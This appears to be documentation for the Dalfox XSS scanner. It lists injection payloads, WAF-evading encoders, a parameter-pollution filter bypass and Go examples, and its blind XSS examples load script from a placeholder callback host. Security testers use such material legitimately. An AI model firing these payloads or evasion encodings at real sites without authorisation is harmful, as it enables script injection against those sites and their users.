Payloads & Encoding

Dalfox ships with a curated, context-aware payload library. Most of the time you don't need to think about it. The engine picks the right payloads for each injection context. This page covers what's built in and how to extend it.

Payload families

Dalfox composes payloads from several families:

Family              Example                               Used when
HTML tag            <svg onload=alert(1)>                 HTML body context
Attribute breakout  '><img src=x onerror=alert(1)>        Inside a quoted attribute value
JavaScript          ";alert(1);//                         Inside a <script> block
Event handler       onmouseover=alert(1)                  Appended to an existing attribute value
DOM clobbering      <img id=x>                            Legacy DOM lookups (e.g. window.x)
URL protocol        javascript:alert(1)                   href/src-like attributes
CSP bypass          nonce exfiltration, fallback origins  When CSP is relaxed
mXSS                <foreignobject> / DOMPurify bypasses  Sanitizer-mutated DOM
Blind               <script src=//callback/></script>     --blind is set

Each payload template carries a marker (class={CLASS} or id={ID}) so the verification stage can positively identify its own element in the DOM.

Context-aware selection

During discovery Dalfox classifies each parameter by injection context, that is, the place in the response where its reflected value lands:

  • HTML body → HTML/attribute-breakout payloads
  • Inside a quoted attribute → attribute-breakout payloads
  • Inside <script> → JS-breakout payloads
  • Inside <style> → CSS payloads
  • Unknown → fallback mix of HTML + attribute

Only payloads that can break out of the detected context are sent, which keeps the request count down without lowering the hit rate.
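The classification above is a heuristic over the raw response, and it is worth seeing how few rules it takes. The program below is an added example, not Dalfox's source: it takes a response body and the unique probe string that was reflected (the name dlfx1234 is a constructed sample) and reports which of the page's buckets the reflection falls into. It goes one step beyond the list by separating an unquoted attribute value from a quoted one, because the breakout payload differs (a space suffices for the former, a closing quote is needed for the latter), and by treating a bare "<" in text as not opening a tag, so "1 < 2" in a paragraph is still classified as HTML body.

```go
package main

import (
	"fmt"
	"strings"
)

// Illustrative reflection-context classifier (added example, not Dalfox's
// source). Contexts returned:
//   "script"             inside the body of a <script> element
//   "style"              inside the body of a <style> element
//   "attribute"          inside a quoted attribute value of some tag
//   "attribute-unquoted" inside a tag but outside quotes (assumed bucket)
//   "html"               in the HTML body, between tags
//   "unknown"            reflected, but the response does not look like HTML
//   "not-reflected"      probe string absent

// asciiLower lowercases ASCII letters only, so byte offsets stay aligned
// with the original body (strings.ToLower can change byte lengths).
func asciiLower(s string) string {
	b := []byte(s)
	for i, c := range b {
		if c >= 'A' && c <= 'Z' {
			b[i] = c + ('a' - 'A')
		}
	}
	return string(b)
}

// insideElementBody reports whether idx lies inside the body of the named
// element: an opening tag and its '>' precede idx, and no closing tag
// appears between that opening tag and idx.
func insideElementBody(lower, name string, idx int) bool {
	open := strings.LastIndex(lower[:idx], "<"+name)
	if open < 0 {
		return false
	}
	gt := strings.Index(lower[open:], ">")
	if gt < 0 || open+gt >= idx {
		return false // still inside the opening tag itself, e.g. <script src="...">
	}
	closeTag := strings.LastIndex(lower[:idx], "</"+name)
	return closeTag < open
}

// lastTagOpen returns the offset of the last '<' before idx that actually
// starts a tag (followed by a letter, '/', '!' or '?'); a bare "<" in text
// does not count.
func lastTagOpen(lower string, idx int) int {
	for i := idx - 1; i >= 0; i-- {
		if lower[i] == '<' && i+1 < len(lower) {
			n := lower[i+1]
			if (n >= 'a' && n <= 'z') || n == '/' || n == '!' || n == '?' {
				return i
			}
		}
	}
	return -1
}

// Classify returns the injection context of the first occurrence of probe in body.
func Classify(body, probe string) string {
	lower := asciiLower(body)
	idx := strings.Index(lower, asciiLower(probe))
	if idx < 0 {
		return "not-reflected"
	}
	if !strings.Contains(lower, "<") {
		return "unknown" // JSON, plain text, etc.: fall back to a mixed payload set
	}
	if insideElementBody(lower, "script", idx) {
		return "script"
	}
	if insideElementBody(lower, "style", idx) {
		return "style"
	}
	lastLT := lastTagOpen(lower, idx)
	lastGT := strings.LastIndex(lower[:idx], ">")
	if lastLT > lastGT {
		// Inside a tag: walk the tag prefix tracking quote state.
		var quote byte
		for i := lastLT; i < idx; i++ {
			c := lower[i]
			switch {
			case quote == 0 && (c == '"' || c == '\''):
				quote = c
			case quote != 0 && c == quote:
				quote = 0
			}
		}
		if quote != 0 {
			return "attribute"
		}
		return "attribute-unquoted"
	}
	return "html"
}

func main() {
	const probe = "dlfx1234" // constructed sample probe string
	for _, body := range []string{
		`<p>Search results for dlfx1234</p>`,
		`<input type="text" value="dlfx1234">`,
		`<script>if (a < b) { var q = "dlfx1234"; }</script>`,
	} {
		fmt.Printf("%-55s -> %s\n", body, Classify(body, probe))
	}
}
```

A real scanner also has to consider the response content type and reflections that appear more than once at different positions; this example classifies only the first occurrence.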

Encoders

Encoders transform the same payload into several byte forms, so a WAF or server-side filter that matches on one literal pattern does not see the same bytes every time.

dalfox https://target.app -e url,html,base64

Available encoders:

Encoder   Transforms < to
none      < (raw)
url       %3C
2url      %253C (double)
3url      %25253C (triple)
4url      %2525253C (quadruple)
html      &#x003c;
htmlpad   zero-padded HTML entity
base64    base64 of the whole payload
unicode   fullwidth mapping (< becomes U+FF1C)
zwsp      zero-width space (U+200B) insertion

Defaults: url,html. If you add none to the list, Dalfox sends only the raw payloads. Note that the double, triple and quadruple URL forms only help when the target decodes more than once (for example a proxy or framework that decodes before a handler decodes again); against a single-decode target a %253C arrives as the literal text %3C and never reaches the HTML parser.
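To make the table concrete, here is an added example (written for this page, not Dalfox's source) that re-implements each encoder name as a plain string transform and an Expand helper that applies a -e style list, including the rule that a list containing none yields only the raw payload. Where the page gives no exact rule the code makes an assumption and says so: htmlpad is taken to be the same entity encoding as html but padded to eight hex digits, unicode maps printable ASCII onto the fullwidth block, and zwsp places U+200B between every pair of characters.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"strings"
)

// Illustrative re-implementations of the encoder names on this page (added
// example, not Dalfox's source).
type Encoder func(string) string

func isAlnum(c byte) bool {
	return (c >= '0' && c <= '9') || (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z')
}

// percentEncode escapes every non-alphanumeric byte as %XX. Applied again it
// yields the 2url/3url/4url forms: '%' becomes %25 while the hex digits survive.
func percentEncode(s string) string {
	var b strings.Builder
	for i := 0; i < len(s); i++ {
		if c := s[i]; isAlnum(c) {
			b.WriteByte(c)
		} else {
			fmt.Fprintf(&b, "%%%02X", c)
		}
	}
	return b.String()
}

// repeat composes an encoder with itself n times.
func repeat(e Encoder, n int) Encoder {
	return func(s string) string {
		for i := 0; i < n; i++ {
			s = e(s)
		}
		return s
	}
}

// entityEncode writes every non-alphanumeric byte as a hex character
// reference zero-padded to width digits (&#x003c; for width 4).
func entityEncode(width int) Encoder {
	return func(s string) string {
		var b strings.Builder
		for i := 0; i < len(s); i++ {
			if c := s[i]; isAlnum(c) {
				b.WriteByte(c)
			} else {
				hex := fmt.Sprintf("%x", c)
				b.WriteString("&#x" + strings.Repeat("0", width-len(hex)) + hex + ";")
			}
		}
		return b.String()
	}
}

// fullwidth maps printable ASCII 0x21-0x7E onto U+FF01-U+FF5E, so '<'
// becomes U+FF1C. This defeats filters that match ASCII bytes before a later
// normalisation step folds the text back.
func fullwidth(s string) string {
	var b strings.Builder
	for _, r := range s {
		if r >= 0x21 && r <= 0x7e {
			r += 0xfee0
		}
		b.WriteRune(r)
	}
	return b.String()
}

// zwsp inserts U+200B between every pair of characters (assumed placement).
func zwsp(s string) string {
	var b strings.Builder
	for i, r := range []rune(s) {
		if i > 0 {
			b.WriteRune('\u200b')
		}
		b.WriteRune(r)
	}
	return b.String()
}

var Encoders = map[string]Encoder{
	"none":    func(s string) string { return s },
	"url":     percentEncode,
	"2url":    repeat(percentEncode, 2),
	"3url":    repeat(percentEncode, 3),
	"4url":    repeat(percentEncode, 4),
	"html":    entityEncode(4),
	"htmlpad": entityEncode(8), // width is an assumption
	"base64":  func(s string) string { return base64.StdEncoding.EncodeToString([]byte(s)) },
	"unicode": fullwidth,
	"zwsp":    zwsp,
}

// Expand returns payload in each requested encoding, in order. As the page
// states for -e, a list that contains "none" yields only the raw payload.
func Expand(payload string, names []string) ([]string, error) {
	for _, n := range names {
		if n == "none" {
			return []string{payload}, nil
		}
	}
	out := make([]string, 0, len(names))
	for _, n := range names {
		enc, ok := Encoders[n]
		if !ok {
			return nil, fmt.Errorf("unknown encoder %q", n)
		}
		out = append(out, enc(payload))
	}
	return out, nil
}

func main() {
	payload := "<svg onload=alert(1)>" // constructed sample payload
	for _, name := range []string{"url", "2url", "html", "base64", "unicode"} {
		fmt.Printf("%-8s %s\n", name, Encoders[name](payload))
	}
}
```

The base64 and fullwidth forms are only useful where something on the server decodes or normalises them back before the value reaches the HTML parser; on their own, browsers do not interpret either as markup.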

Custom payloads

Provide your own list, one payload per line:

dalfox https://target.app --custom-payload mypayloads.txt

Swap out the built-in library entirely:

dalfox https://target.app --custom-payload mypayloads.txt --only-custom-payload

Remote payload sources

Pull community wordlists on demand:

dalfox https://target.app --remote-payloads portswigger,payloadbox

Supported sources: portswigger, payloadbox. Fetched once per run, respecting --proxy and --timeout.

Inspecting payloads

Print a payload family without running a scan:

dalfox payload event-handlers  # onerror, onmouseover, ...
dalfox payload useful-tags     # svg, img, script, ...
dalfox payload uri-scheme      # javascript:, data:, vbscript:
dalfox payload portswigger     # fetch + print remote list

Customising the "alert"

The classic alert(1) is noisy and proves little on its own. Swap the value for something that shows where the payload executed, such as document.domain:

dalfox https://target.app \
  --custom-alert-value "document.domain" \
  --custom-alert-type none

  • --custom-alert-value: the argument handed to alert/prompt/confirm (default 1).
  • --custom-alert-type: none inserts the value as-is, so document.domain is evaluated as an expression; str wraps the value in quotes, so the same value would pop the literal text "document.domain" as a string.

Blind XSS

Blind XSS fires later, in a context you can't see (an admin panel, a support agent's dashboard). You need an out-of-band listener:

dalfox https://target.app -b https://your-callback.interact.sh

Custom blind templates:

dalfox https://target.app \
  -b https://your-callback.example \
  --custom-blind-xss-payload blind-templates.txt
# each line may contain {} (replaced with the callback URL)

HTTP Parameter Pollution (HPP)

Some filters only inspect the first occurrence of a parameter. Dalfox can duplicate parameters to slip a payload into the second slot. Whether this reaches the application depends on which occurrence the backend honours: some frameworks take the first value, some the last, and some concatenate all of them, so a finding here should be confirmed against the real handler.

dalfox https://target.app --hpp
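The mechanism is easy to see end to end. This added example (written for this page, not Dalfox's source) builds a polluted query with a benign value in the first slot and the payload in the second, runs it through a filter that only looks at the first value, and then shows the same query as three kinds of backend might read it. The filter and the three backend views are assumed models of common behaviour (first-wins as in Go's url.Values.Get, last-wins as in PHP's $_GET, comma-joined as in classic ASP.NET), not measurements of any particular product.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Added example (not Dalfox's source): why a duplicated parameter gets past a
// filter that inspects only the first occurrence.

// PollutedQuery builds "param=benign&param=payload", benign first, so a
// first-occurrence filter sees only the benign value.
func PollutedQuery(param, benign, payload string) string {
	p := url.QueryEscape(param)
	return p + "=" + url.QueryEscape(benign) + "&" + p + "=" + url.QueryEscape(payload)
}

// FirstOnlyFilter models a filter that calls url.Values.Get (first value
// only) and blocks when that value contains a tag opener.
func FirstOnlyFilter(rawQuery, param string) (blocked bool, err error) {
	v, err := url.ParseQuery(rawQuery)
	if err != nil {
		return false, err
	}
	return strings.Contains(v.Get(param), "<"), nil
}

// BackendViews parses the same query the way three backend styles might:
// first occurrence wins, last occurrence wins, or all occurrences joined
// with a comma (assumed models, see the lead-in).
func BackendViews(rawQuery, param string) (first, last, joined string, err error) {
	v, err := url.ParseQuery(rawQuery)
	if err != nil {
		return "", "", "", err
	}
	vals := v[param]
	if len(vals) == 0 {
		return "", "", "", nil
	}
	return vals[0], vals[len(vals)-1], strings.Join(vals, ","), nil
}

func main() {
	// Constructed sample: a harmless value in slot one, the payload in slot two.
	raw := PollutedQuery("q", "hello", "<svg onload=alert(1)>")
	fmt.Println("query:", raw)
	blocked, _ := FirstOnlyFilter(raw, "q")
	fmt.Println("first-only filter blocks:", blocked)
	first, last, joined, _ := BackendViews(raw, "q")
	fmt.Printf("first=%q last=%q joined=%q\n", first, last, joined)
}
```

Against a first-wins backend the payload never executes even though the filter let it through, which is why --hpp findings need the same verification step as any other.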

Deep scan

By default Dalfox stops testing a parameter once it finds a verified payload. --deep-scan keeps going:

dalfox https://target.app --deep-scan

Useful for research; slower for production pipelines.

Skipping payload stages

Flag                  Effect
--skip-xss-scanning   Discover and probe only; no payload injection
--skip-ast-analysis   Skip AST-based DOM-XSS detection
